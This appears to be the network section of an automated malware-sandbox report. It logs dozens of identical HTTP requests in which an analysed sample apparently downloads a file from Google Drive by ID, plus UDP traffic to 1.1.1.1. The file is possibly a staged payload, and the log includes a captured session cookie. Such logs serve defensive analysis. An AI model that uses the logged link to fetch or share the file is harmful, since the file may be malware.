      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
      Source: global trafficHTTP traffic detected: GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
